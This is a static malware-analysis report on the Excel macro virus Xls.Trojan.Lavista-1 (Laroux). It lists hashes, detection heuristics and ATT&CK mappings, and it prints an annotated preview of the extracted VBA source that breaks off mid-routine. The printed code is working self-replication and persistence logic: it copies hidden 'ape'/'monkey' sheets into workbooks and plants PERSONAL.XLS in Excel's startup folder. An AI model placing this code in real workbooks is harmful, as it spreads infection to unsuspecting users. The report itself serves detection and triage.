Xls.Trojan.Lavista-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 fddd2c3a3822345d…

MALICIOUS

Office (OLE)

37.0 KB Created: 2003-07-09 13:48:43 First seen: 2012-06-14
MD5: ae22cab5146286a876cf2a20efd84442 SHA-1: 97fb5a79e9797f5e15c53eb6907aa36b8b350f64 SHA-256: fddd2c3a3822345d196fa775392bacdc2beec47c3f741f701e25db71538417b2
180 Risk Score

Malware Insights

Xls.Trojan.Lavista-1 · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

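The file is identified as a malicious Excel 5 macro-virus (Laroux/Lavista-1) by multiple heuristics, including critical firings for macro virus markers and ClamAV detection. The VBA script contains an Auto_Open macro, which is designed to execute automatically upon opening the document. The script attempts to establish persistence through the 'PERSONAL.XLS' workbook in Excel's startup path (Application.StartupPath): it checks whether that workbook exists and already holds the 'ape' module, then copies the hidden 'ape' and 'monkey' sheets between it and the active workbook, or saves a new PERSONAL.XLS there. Because Excel opens workbooks in its startup folder at launch, this is intended to make the macro run whenever Excel is started. Note that this is Excel's own startup folder rather than a Windows registry Run key or the Windows Startup folder, so ATT&CK T1137.001 (Office Application Startup: Office Template Macros) describes the mechanism more closely than T1547.001. When triaging a host, check the Excel startup folder for an unexpected PERSONAL.XLS containing hidden 'ape'/'monkey' sheets.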

Heuristics 4

  • ClamAV: Xls.Trojan.Lavista-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Lavista-1
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5441 bytes
SHA-256: daff1c14b50b2d4c156f2e01393268200ceae19e512b063553534190d7e67f41
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ape"




' Analyst annotations (comments only; the extracted code is unchanged).
' Module-level state shared by the Subs in this module:
'   no           - 1-based index used to walk a workbook's Modules collection
'   off          - scan flag: 0 = keep scanning, 1 = stop
'   find_mod     - set to 1 by test_aktiv_book when the active workbook has a module named "ape"
'   find_mod_per - set to 2 by test_personal when PERSONAL.XLS has a module named "ape"
'   exist_per    - set to 4 by test_personal when PERSONAL.XLS is found in Application.StartupPath
' create_modul sums exist_per + find_mod + find_mod_per and branches on the totals 6, 5 and 1,
' so the values 1 / 2 / 4 act as independent flags for the three checks.
Dim no As Integer
Dim off As Integer
Dim find_mod As Integer
Dim find_mod_per As Integer
Dim exist_per As Integer

' test_aktiv_book (analyst annotation): infection check for the active workbook.
' Scans ActiveWorkbook.Modules for a module named "ape" and records the result in the
' module-level variable find_mod (1 = found, 0 = not found). Uses the module-level
' variables no and off as scratch state; takes no arguments and returns nothing.
Sub test_aktiv_book()
Attribute test_aktiv_book.VB_ProcData.VB_Invoke_Func = " \n14"
    ' Screen updating is switched off and is not switched back on in this Sub.
    Application.ScreenUpdating = False
    ' Any runtime error from here on jumps to the "defect" label.
    On Error GoTo defect
    no = 1
    find_mod = 0
    off = 0
    ' The loop has no upper bound on no: it stops either when a module named "ape" is found
    ' or when an error transfers control to "defect" - presumably raised by indexing past
    ' the last module; confirm in an isolated analysis environment.
    Do While off = 0
        If ActiveWorkbook.Modules(no).Name = "ape" Then
            off = 1
            find_mod = 1
        Else
            no = no + 1
        End If
    Loop
    Exit Sub
defect:
    ' Error path: report "module not present in the active workbook".
    find_mod = 0
End Sub
' test_personal (analyst annotation): checks the persistence location.
' 1. Looks for a file named PERSONAL.XLS in Application.StartupPath and records the
'    result in exist_per (4 = present, 0 = absent).
' 2. If present, scans Workbooks("PERSONAL.XLS").Modules for a module named "ape" and
'    records the result in find_mod_per (2 = found, 0 = not found).
' Uses the module-level variables no and off as scratch state; takes no arguments and
' returns nothing.
Sub test_personal()
Attribute test_personal.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.ScreenUpdating = False
    ' NOTE(review): as extracted, the literal "PERSONAL.XLS in the Dir() call below has no
    ' closing quote, so this line would not parse as shown. This may be an extraction or
    ' decoding artifact; compare against the raw macro stream before relying on it.
    If UCase(Dir(Application.StartupPath & "\" & "PERSONAL.XLS)) = "PERSONAL.XLS" Then
        exist_per = 4
    Else
        exist_per = 0
    End If
    If exist_per = 4 Then
        ' Any runtime error from here on jumps to the "defect" label.
        On Error GoTo defect
        no = 1
        find_mod_per = 0
        off = 0
        ' Same unbounded scan as test_aktiv_book, but against the workbook named
        ' PERSONAL.XLS in the Workbooks collection. It ends on a match or on an error -
        ' presumably index out of range, or PERSONAL.XLS not being open; confirm.
        Do While off = 0
            If Workbooks("PERSONAL.XLS").Modules(no).Name = "ape" Then
                off = 1
                find_mod_per = 2
            Else
                no = no + 1
            End If
        Loop
        Exit Sub
' The error-handler label sits inside the If branch; it resets the result to "not found".
defect:
        find_mod_per = 0
    Else
        ' PERSONAL.XLS does not exist, so the module cannot be present in it.
        find_mod_per = 0
    End If
End Sub
Sub create_modul()
Attribute create_modul.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.ScreenUpdating = False
    On Error GoTo defect
    Application.DisplayAlerts = False
    Application.Run ("test_aktiv_book")
    Application.Run ("test_personal")
    path_book = ActiveWorkbook.Path
    name_book = ActiveWorkbook.Name
    name_sheet = ActiveSheet.Name
    If exist_per + find_mod + find_mod_per = 6 Then
        Windows("PERSONAL.XLS").Visible = True
        Sheets("ape").Visible = True
        Sheets("monkey").Visible = True
        Workbooks("PERSONAL.XLS").Sheets("ape").Copy before:=Workbooks(name_book).Sheets(1)
        Workbooks("PERSONAL.XLS").Sheets("monkey").Copy before:=Workbooks(name_book).Sheets(1)
        Workbooks(name_book).Sheets("ape").Visible = False
        Workbooks(name_book).Sheets("monkey").Visible = xlVeryHidden
        Workbooks("PERSONAL.XLS").Sheets("ape").Visible = False
        Workbooks("PERSONAL.XLS").Sheets("monkey").Visible = xlVeryHidden
        Windows("PERSONAL.XLS").Visible = False
        Workbooks("PERSONAL.XLS").Save
        Workbooks(name_book).Sheets(name_sheet).Activate
        If ActiveWorkbook.Path <> "" Then
            Workbooks(name_book).Save
        End If
    ElseIf exist_per + find_mod + find_mod_per = 5 Then
        Windows("PERSONAL.XLS").Visible = True
        Workbooks(name_book).Sheets("ape").Visible = True
        Workbooks(name_book).Sheets("monkey").Visible = True
        Workbooks(name_book).Sheets("ape").Copy before:=Workbooks("PERSONAL.XLS").Sheets(1)
        Workbooks(name_book).Sheets("monkey").Copy before:=Workbooks("PERSONAL.XLS").Sheets(1)
        Workbooks(name_book).Sheets("ape").Visible = False
        Workbooks(name_book).Sheets("monkey").Visible = xlVeryHidden
        Workbooks("PERSONAL.XLS").Sheets("ape").Visible = False
        Workbooks("PERSONAL.XLS").Sheets("monkey").Visible = xlVeryHidden
        Windows("PERSONAL.XLS").Visible = False
        Workbooks("PERSONAL.XLS").Save
        Workbooks(name_book).Sheets(name_sheet).Activate
        Application.OnWindow = ""
        Application.OnWindow = "PERSONAL.XLS!create_modul"
    ElseIf exist_per + find_mod + find_mod_per = 1 Then
        Workbooks(name_book).Modules.Add
        new_module = ActiveSheet.Name
        ActiveSheet.Select
        ActiveSheet.Copy
        With ActiveWorkbook
            .Title = ""
            .Subject = ""
            .Author = ""
            .Keywords = ""
            .Comments = ""
        End With
        new_book = ActiveWorkbook.Name
        ActiveWindow.Visible = False
        Workbooks(new_book).SaveAs Filename:=Application.StartupPath & "\" & "PERSONAL.XLS"
        Windows("PERSONAL.XLS"
... (truncated)